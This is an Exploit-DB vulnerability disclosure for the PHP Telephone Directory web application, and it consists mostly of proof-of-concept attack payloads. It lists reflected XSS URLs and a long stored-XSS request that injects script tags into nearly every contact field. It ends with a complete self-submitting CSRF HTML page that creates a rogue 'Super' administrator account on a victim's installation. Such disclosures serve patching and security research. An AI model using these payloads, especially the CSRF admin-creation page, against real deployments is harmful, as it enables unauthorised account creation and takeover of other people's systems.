PHP Telephone Directory - Multiple Vulnerabilities

EDB-ID:

40552

CVE:

N/A




Platform:

PHP

Date:

2016-10-16


# Exploit Title: PHP Telephone Directory - Multiple Vulnerabilities
# Date: 2016-10-16
# Exploit Author: larrycompress
# Contact: larrycompress@gmail.com
# Type: webapps
# Platform: PHP
# Vendor Homepage: http://www.pagereactions.com/product.php?pku=2
# Software Link: http://www.pagereactions.com/downloads/phptelephonedirectory.zip
---------------------------------------------------------------------------------

POC as follows :

# 0x00 Reflected XSS

---

1.In public search :

http://192.168.1.112/phptelephonedirectory/index.php?key=<svg/onload=alert(1)>

2.In administration web interface (need normal user login) :

http://192.168.1.112/phptelephonedirectory/administration.php?key=<svg/onload=alert(1)>

# 0x01 Stored XSS

---

1.In administration web directory interface (need normal user login) :

http://192.168.1.112/phptelephonedirectory/administration.php
?pageaction=newcontact
&subaction=submit
&id=1
&dtDOBDate=0000-00-00
&pointcode=<script>alert(1)/*
&contacttitle=*/</script>
&firstname=<script>alert(2)</script>
&lastname=<script>alert(3)</script>
&middlename=<script>alert(4)</script>
&DOBdateradio=usenew
&dateday=16
&datemonthnewedit=10
&dateyearnewedit=2015
&employeeID=<script>alert(5)/*
&otherID=*/</script>
&phonenumber1=<script>alert(6)</script>
&internalphonenumber=<script>alert(7)</script>
&phonenumber2=<script>alert(8)</script>
&phonenumber3=<script>alert(9)</script>
&fax=<script>alert(10)</script>
&mobilecell=<script>alert(11)</script>
&email=<script>alert(12)</script>
&alternateemail=<script>alert(13)</script>
&chat=<script>alert(14)</script>
&website=<script>alert(15)</script>
&socialmedia1=<script>alert(16)</script>
&socialmedia2=<script>alert(17)</script>
&socialmedia3=<script>alert(18)</script>
&contactposition=<script>alert(19)</script>
&company=<script>alert(20)</script>
&qualifications=<script>alert(21)</script>
&departmentnewedit=
&buildingroom=<script>alert(22)</script>
&address=<script>alert(23)</script>
&city=<script>alert(24)</script>
&suburb=<script>alert(25)</script>
&tdstate=<script>alert(26)</script>
&zippostcode=<script>alert(27)/*
&country=*/</script><script>alert(28)</script>
&description=<script>alert(29)</script>
&recordstatus=active

2.In administration web department interface (need normal user login) :

http://192.168.1.112/phptelephonedirectory/administration.php?pageaction=newdepartment&subaction=submit&departmentname=</select><svg/onload=alert(1)><select>

# 0x02 CSRF (add Super user)

---

In http://192.168.1.103/csrf.html :

<!DOCTYPE html>
<html>
  <body>
    <form action="http://192.168.1.112/phptelephonedirectory/administration.php" method="POST">
      <input name="pageaction" value="saveuser" type="hidden" />
      <input name="subaction" value="submit" type="hidden" />
      <input name="username" value="larry_csrf" type="hidden" />
      <input name="password" value="larry_csrf" type="hidden" />
      <input name="userfullname" value="larry_csrf" type="hidden" />
      <input name="accesslevel" value="Super" type="hidden" />
      <input name="userstatus" value="active" type="hidden" />
      <input name="mysubmit" value="submit" type="submit" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>

* Thanks to Besim *